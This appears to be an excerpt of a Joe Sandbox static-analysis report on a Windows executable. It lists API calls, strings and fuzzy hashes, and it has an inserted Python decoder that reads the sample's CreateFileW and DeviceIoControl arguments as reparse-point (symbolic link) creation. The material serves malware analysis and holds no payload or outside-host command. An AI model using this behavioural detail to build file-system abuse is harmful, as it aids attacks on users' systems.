• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: ItemText
• String ID:
• API String ID: 3367045223-0
• Opcode ID: b5aa30477f0c461b35f9d9f8cbc23880ccfc4c047bbf5d75b1d4c96850ec3935
• Instruction ID: a85ea06b7712a032f58b0e93e87c1da8e29f4ed84421153c7044d39f1f2610fe
• Opcode Fuzzy Hash: b5aa30477f0c461b35f9d9f8cbc23880ccfc4c047bbf5d75b1d4c96850ec3935
• Instruction Fuzzy Hash: 5EC00231508200FFCB05CF58ED48E1BBBB6FB95311B51C568F05886030C331D961DBA2
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f907654f111fe53507ced0394b3d6542e8009d950c2b1c96e1167c051188d9b4
• Instruction ID: 8b18ec4610fae345d2bb180b379847e80188a24e5d889ad39b9e01fee590d7ba
• Opcode Fuzzy Hash: f907654f111fe53507ced0394b3d6542e8009d950c2b1c96e1167c051188d9b4
• Instruction Fuzzy Hash: BEA001AE2AE512BC318862616E56E7A022DE5D9F653358A1AF402C5082A98118891031
APIs
• SetEndOfFile.KERNELBASE(?,00A2D115,?,?,?,?,?,?,?), ref: 00A2E8DC
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: e7b153db37b66336563d019d153adbf2bb6c873a97397844f644cee6d3e6454c
• Instruction ID: 6a0e4c950f8cb8b6e39b4a532399eaed5086ba62a339841be1c25cd61fa8af1e
• Opcode Fuzzy Hash: e7b153db37b66336563d019d153adbf2bb6c873a97397844f644cee6d3e6454c
• Instruction Fuzzy Hash: 4AA00130201205CBDA415B61DE0960E7A6ABE516AA71980A8A409890B5DB2688A3EA41
APIs
• CloseHandle.KERNELBASE(?,?,00000001,00A2DE10,5C02E116,?,00000000,00A593B1,000000FF,?,00A2BEA6,?), ref: 00A2DE6B
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 10bae971b7aa8fcf81d98cbb46358f0f634578e2b0dafaae00dd78e11fd344dd
• Instruction ID: 856ab4677fb1cee3b11086d930fa673d8011bb1765389ab2cbd9443c35d96033
• Opcode Fuzzy Hash: 10bae971b7aa8fcf81d98cbb46358f0f634578e2b0dafaae00dd78e11fd344dd
• Instruction Fuzzy Hash: 96F0A0B0442B61DFE7349B3CE804393B7E46B21335F058B2ED0F64A5E5C3B0A9899B50
APIs
• _wcslen.LIBCMT ref: 00A29CB1
  • Part of subcall function 00A2AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A2AC2E
  • Part of subcall function 00A2AC11: GetLastError.KERNEL32 ref: 00A2AC72
  • Part of subcall function 00A2AC11: CloseHandle.KERNEL32(?), ref: 00A2AC81
  • Part of subcall function 00A22F45: _wcslen.LIBCMT ref: 00A22F50
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00A29EE1
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A29F1E
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00A2A0BF
  • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00A2A127
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A134
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A14A
• RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A18E
• DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5C02EC5E,00A59937,000000FF), ref: 00A2A196
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3517300771-3508440684
• Opcode ID: c4dfa051757887d015aec627f24cd4883a7f4c31c15691f54a571e85f09cb0d2
• Instruction ID: 2c419e3176976649d0eede88dccfaca74137f128a92ed9300d4798fc25863430
• Opcode Fuzzy Hash: c4dfa051757887d015aec627f24cd4883a7f4c31c15691f54a571e85f09cb0d2
• Instruction Fuzzy Hash: 41327E71900298EFDF24DFA8ED91BEE77B9BF15710F104129E849E7281DB349A48CB61
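The API references for the function at 00A29CB1 above record raw argument values only. The decoder below is an added example, not part of the Joe Sandbox report or of the analysed sample; it parses the report's `Api.Module(args), ref: addr` line format and names the CreateFileW and DeviceIoControl arguments using the documented Windows SDK constants (fileapi.h, winioctl.h). Only the handful of constants needed for the three calls quoted from the listing is included; the sample lines are copied from the listing, not constructed.

```python
"""Decode argument values from Joe Sandbox API reference lines (added example)."""
import re

# Joe Sandbox prints:  Api.Module(arg0,arg1,...), ref: <address>
# Arguments are hex (occasionally negative) or "?" when the value was not recovered.
_API_LINE = re.compile(
    r"^(?P<api>[^.(\s]+)\.(?P<module>[^(\s]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Windows SDK values (fileapi.h / winnt.h / winioctl.h), restricted to what the calls above use.
_GENERIC = [(0x10000000, "GENERIC_ALL"), (0x20000000, "GENERIC_EXECUTE"),
            (0x40000000, "GENERIC_WRITE"), (0x80000000, "GENERIC_READ")]
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_FLAGS = [(0x00000080, "FILE_ATTRIBUTE_NORMAL"),
          (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
          (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
          (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
          (0x40000000, "FILE_FLAG_OVERLAPPED")]
_DEVICE_TYPES = {0x09: "FILE_DEVICE_FILE_SYSTEM"}
_METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
_ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
           "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
_FSCTL_NAMES = {  # (device type, function number) -> name, from winioctl.h
    (0x09, 41): "FSCTL_SET_REPARSE_POINT",
    (0x09, 42): "FSCTL_GET_REPARSE_POINT",
    (0x09, 43): "FSCTL_DELETE_REPARSE_POINT",
}


def parse_api_line(line):
    """Parse one '• Api.Module(args), ref: addr' line into a dict."""
    text = line.strip().lstrip("•").strip()
    m = _API_LINE.match(text)
    if not m:
        raise ValueError("not a Joe Sandbox API line with arguments: %r" % line)
    args = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok == "?":
            args.append(None)
        else:
            try:
                args.append(int(tok, 16))      # handles the signed form "-00000008" too
            except ValueError:
                args.append(tok)               # string argument such as \??\
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def _bits(value, table):
    """Name the flag bits in value; any leftover bits are reported as hex."""
    names, rest = [], value
    for bit, name in table:
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append("0x%08X" % (rest & 0xFFFFFFFF))
    return names


def decode_create_file(desired_access, disposition, flags):
    """Decode dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes."""
    return {"access": _bits(desired_access, _GENERIC),
            "disposition": _DISPOSITION.get(disposition, "0x%X" % disposition),
            "flags": _bits(flags, _FLAGS)}


def decode_ioctl(code):
    """Split a CTL_CODE value into device/access/function/method and name it when known."""
    code &= 0xFFFFFFFF
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {"code": code, "device": _DEVICE_TYPES.get(device, "0x%04X" % device),
            "function": function, "method": _METHODS[method], "access": _ACCESS[access],
            "name": _FSCTL_NAMES.get((device, function), "UNKNOWN")}


def describe(line):
    """Parse a line and decode the arguments that matter for the two APIs above."""
    rec = parse_api_line(line)
    a = rec["args"]
    if rec["api"] == "CreateFileW":       # (name, access, share, sa, disposition, flags, template)
        rec["decoded"] = decode_create_file(a[1], a[4], a[5])
    elif rec["api"] == "DeviceIoControl":  # (hDevice, dwIoControlCode, ...)
        rec["decoded"] = decode_ioctl(a[1])
    return rec


# The three calls from the function at 00A29CB1, copied from the listing above.
SAMPLE_LINES = [
    r"• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00A29EE1",
    r"• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00A2A0BF",
    r"• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00A2A127",
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        rec = describe(sample)
        print("%08X %-16s %s" % (rec["ref"], rec["api"], rec["decoded"]))
```

Run against the three lines, the decoder reports the first CreateFileW as GENERIC_WRITE / CREATE_NEW / FILE_ATTRIBUTE_NORMAL, the second as GENERIC_READ|GENERIC_WRITE / OPEN_EXISTING with FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_BACKUP_SEMANTICS, and the control code 000900A4 as FSCTL_SET_REPARSE_POINT (FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED). That combination, next to the SeCreateSymbolicLinkPrivilege, SeRestorePrivilege and `\??\` strings in the same function, is consistent with a routine that creates reparse points (symbolic links or junctions) and is the kind of thing worth confirming against the sample's file-system activity rather than from the API names alone.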
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A4163A
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A416BB
                                                                                                                                                      • EndDialog.USER32(?,00000006), ref: 00A416CE
                                                                                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00A416EA
                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00A416F1
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A21DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00A21DFC
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A41763
                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A41783
                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00A41826
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A418AD
                                                                                                                                                        • Part of subcall function 00A21150: _wcslen.LIBCMT ref: 00A2115B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                                                                                                                      • String ID: %s %s$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 485132379-439456425
                                                                                                                                                      • Opcode ID: 0db9669ef89c9c3c97b37f9590a3419d4d7cfb7de59eeaf35ca68f6e24993606
                                                                                                                                                      • Instruction ID: 2dd87a163ebb64821592c20619180ae158ad499f58d55d53797b2b81b7d5cbfd
                                                                                                                                                      • Opcode Fuzzy Hash: 0db9669ef89c9c3c97b37f9590a3419d4d7cfb7de59eeaf35ca68f6e24993606
                                                                                                                                                      • Instruction Fuzzy Hash: 8FA1A275900228BADB25EBB4DE46FEEB77CAF55300F0041E5F609A7082DA749F858B61
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                      • Opcode ID: d6ed8f27dbcbb96b4b77075205e9132cd32dfc5acc1701711ff09988c0345332
                                                                                                                                                      • Instruction ID: 44ec8b022f2f3e6ef463edb787694cbae5b776135f65c333122d87026390e46f
                                                                                                                                                      • Opcode Fuzzy Hash: d6ed8f27dbcbb96b4b77075205e9132cd32dfc5acc1701711ff09988c0345332
                                                                                                                                                      • Instruction Fuzzy Hash: 6BC23871E086288BDB25CF28DD507EAB7B5FB48356F1541EAD80DE7240E774AE898F40
                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 00A2438C
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A24523
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                                                                      • String ID: CMT
                                                                                                                                                      • API String ID: 2172594012-2756464174
                                                                                                                                                      • Opcode ID: afd3ac4b6b585361376b1c1645cff8faccf04e29b19bcf4912ea63b69bb5975d
                                                                                                                                                      • Instruction ID: 28d10d6bfa57b2dd038274bbe3a24110609b412d45fe7e635d368495397d463a
                                                                                                                                                      • Opcode Fuzzy Hash: afd3ac4b6b585361376b1c1645cff8faccf04e29b19bcf4912ea63b69bb5975d
                                                                                                                                                      • Instruction Fuzzy Hash: 5B72D072A003548FCF18DF68D9917EA7BB1BF19300F08457DEC5A9B282DB74AA45CB61
                                                                                                                                                      APIs
                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A46884
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00A46950
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A46970
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00A4697A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                      • Opcode ID: 1a91da51473dc8c55fa16d32cbece52cba862a123dc3eba2aa955d751f8137b9
                                                                                                                                                      • Instruction ID: 620452581888dba0bceffb362e64ce79e364dfe4699ddc57e8a184c96b5e775c
                                                                                                                                                      • Opcode Fuzzy Hash: 1a91da51473dc8c55fa16d32cbece52cba862a123dc3eba2aa955d751f8137b9
                                                                                                                                                      • Instruction Fuzzy Hash: 35312979D453189FDB11DFA4D9897CCBBB8BF08301F1041AAE40CAB251EB719A858F45
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00A2952D,?,00000040,00A2931E,00000001,?,?,?,?,0000001C,00A37618,00A6E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00A29330
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00A2952D,?,00000040,00A2931E,00000001,?,?), ref: 00A29351
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A29360
                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00A6E0C8,?,?,00A2952D,?,00000040,00A2931E,00000001,?,?,?,?,0000001C), ref: 00A29373
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 991192900-0
                                                                                                                                                      • Opcode ID: bcac6ff74770da6fbbac8521813f0cd758f185c92ce25be19d04afb13c461604
                                                                                                                                                      • Instruction ID: c4e633301dfcd2a15379ff70c7c0ab6c9be2426282ce3bafe6d51d53f4b5e896
                                                                                                                                                      • Opcode Fuzzy Hash: bcac6ff74770da6fbbac8521813f0cd758f185c92ce25be19d04afb13c461604
                                                                                                                                                      • Instruction Fuzzy Hash: 54F08279500314FFEB04DBA5AE05EFF77BCEB85B91B108029F502AA1D0CA709E019674
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualQuery.KERNEL32(80000000,00A44D59,0000001C,00A44F4E,00000000,?,?,?,?,?,?,?,00A44D59,00000004,00A75D84,00A44FDE), ref: 00A44E25
                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A44D59,00000004,00A75D84,00A44FDE), ref: 00A44E40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoQuerySystemVirtual
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 401686933-2746444292
                                                                                                                                                      • Opcode ID: aa89df3697d656e732d0d23f8185e58c41ad3a17982e42d234216e82e9e21b54
                                                                                                                                                      • Instruction ID: 9817d5eb9085d7ad7fc4029c74905fcbc38736422ba0a054de877a5cc0592de5
                                                                                                                                                      • Opcode Fuzzy Hash: aa89df3697d656e732d0d23f8185e58c41ad3a17982e42d234216e82e9e21b54
                                                                                                                                                      • Instruction Fuzzy Hash: FA01F7366002096BCB14DF69CC06BEE7BA9BFC8338F0CC225ED19DB255D734D8028680
                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00A4535E), ref: 00A4ABBC
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00A4535E), ref: 00A4ABC6
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00A4535E), ref: 00A4ABD3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906539128-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3FD6A
• GetNumberFormatW.KERNEL32(00000400,00000000,?,00A69714,?,?), ref: 00A3FDB3
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID:
• String ID: CMT
• API String ID: 0-2756464174
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A586CD,?,?,00000008,?,?,00A5836D,00000000), ref: 00A588FF
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A466AA
Memory Dump Source
